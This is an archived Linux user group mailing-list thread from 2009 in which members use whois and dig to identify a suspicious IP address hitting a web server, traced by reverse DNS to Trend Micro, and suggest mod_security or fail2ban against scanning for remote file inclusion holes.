[plug] 150.70.84.43

michaelbaker at westnet.com.au michaelbaker at westnet.com.au
Sun Jan 11 22:35:41 WST 2009


Most likely a script kiddy box or a hacked machine running scripts to search for RFI's which will allow it to execute PHP code on your web server.. Google mod_security that will stop alot of it or get sommething like fail2ban watching the web server logs for 404's and it can firewall the IP's for you
----- Original Message -----
From: Niffum <bulkniffum at iinet.net.au>
To: plug at plug.org.au
Sent: Sun, 11 Jan 2009 19:01:30 +0900 (WST)
Subject: Re: [plug] 150.70.84.43

I tried nslookup to resolve the ip address, I didn't know about dig -x..

I thought it may be a dodgy host because i would expect that a non 
dodgy host would have created a reverse lookup that i could just nslookup.

Trend is installed on this pc so that would be why.  I was about to 
add that ip address to my already huge hosts.deny

At 05:52 PM 11/01/2009, you wrote:

>it seems that the IP address is hosted in Japan.
>
>whois tells me
>whois 150.70.84.43
>inetnum:      150.26.0.0 - 150.100.255.255
>netname:      JAPAN150
>country:      JP
>descr:        Japan Network Information Center
>    <snip>
>role:         Japan Network Information Center
>address:      Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
>address:      Chiyoda-ku, Tokyo 101-0047, Japan
>country:      JP
>    <snip>
>
>and a reverse DNS tells me that trendmicro are using the specific IP.
>
>dig -x 150.70.84.43
>; <<>> DiG 9.3.4-P1 <<>> -x 150.70.84.43
>;; global options:  printcmd
>;; Got answer:
>;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26411
>;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
>
>;; QUESTION SECTION:
>;43.84.70.150.in-addr.arpa.     IN      PTR
>
>;; AUTHORITY SECTION:
>70.150.in-addr.arpa.    3600    IN      SOA 
>tmns1.trendmicro.com. dnsadmin.trendmicro.com. 55 60 600 86400 3600
>
>;; Query time: 1058 msec
>;; SERVER: 10.1.1.100#53(10.1.1.100)
>;; WHEN: Sun Jan 11 17:40:17 2009
>;; MSG SIZE  rcvd: 108
>
>
>Not knowing your set up: is it possible you have the trendmicro 
>antivirus software installed and that this is using a remote service 
>to check websites for malicious code or what ever on the website?
>
>My dealings with Trendmicro is that their products are pretty good 
>so I don't think that it is a dodgy remote host.
>
>good luck
>

_______________________________________________
PLUG discussion list: plug at plug.org.au
http://www.plug.org.au/mailman/listinfo/plug
Committee e-mail: committee at plug.linux.org.au




More information about the plug mailing list